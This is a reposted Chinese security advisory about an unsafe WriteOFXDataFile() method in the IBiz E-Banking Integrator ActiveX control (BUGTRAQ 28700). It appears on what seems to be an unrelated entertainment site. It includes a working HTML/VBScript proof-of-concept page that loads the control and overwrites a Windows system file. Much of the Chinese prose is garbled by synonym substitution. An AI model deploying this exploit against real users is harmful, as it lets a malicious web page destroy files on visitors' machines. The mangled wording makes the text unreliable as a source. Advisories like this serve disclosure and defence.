IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用缝隙sina - 亚美娱乐

IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用缝隙sina

2019-02-12 11:26:36 | 作者: 昆明 | 标签: 办法,用户,厂商 | 浏览: 6981

受影响体系:
/n software IBiz E-Banking Integrator 2.0
描绘:

BUGTRAQ ID: 28700 IBiz E-Banking Integrator是用于从银行、投资公司等帐号拜访财政买卖信息的解决方案。 IBiz E-Banking Integrator所供给的IBizEBank.FIProfile.1 ActiveX控件(fiprofile20.ocx)没有正确地处理对WriteOFXDataFile()办法的调用,假如用户上当拜访了歹意网页的话,就或许导致以当时登录用户的权限掩盖和损坏体系上的恣意文件。 <*来历:shinnai (shinnai@autistici.org)

链接:https://secunia.com/advisories/29758/
*> 测验办法:
警 告 以下程序(办法)或许带有攻击性,仅供安全研讨与教育之用。运用者危险自傲! <object classid=clsid:24445430-F789-11CE-86F8-0020AFD8C6DB id=test></object> <input language=VBScript onclick=tryMe() type=button value=Click here to start the test> <script language=vbscript>
Sub tryMe()
On Error Resume Next
test.WriteOFXDataFile "C:\WINDOWS\system_.ini"
If Err.Number <> 0 Then
MsgBox "Something went wrong!"
Else
MsgBox "Exploit Completed!"
End If
End Sub
</script> 主张:

厂商补丁: /n software
-
现在厂商还没有供给补丁或许晋级程序,咱们主张运用此软件的用户随时重视厂商的主页以获取最新版别: https://www.nsoftware.com/ibiz/ebank/default.aspx
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表亚美娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章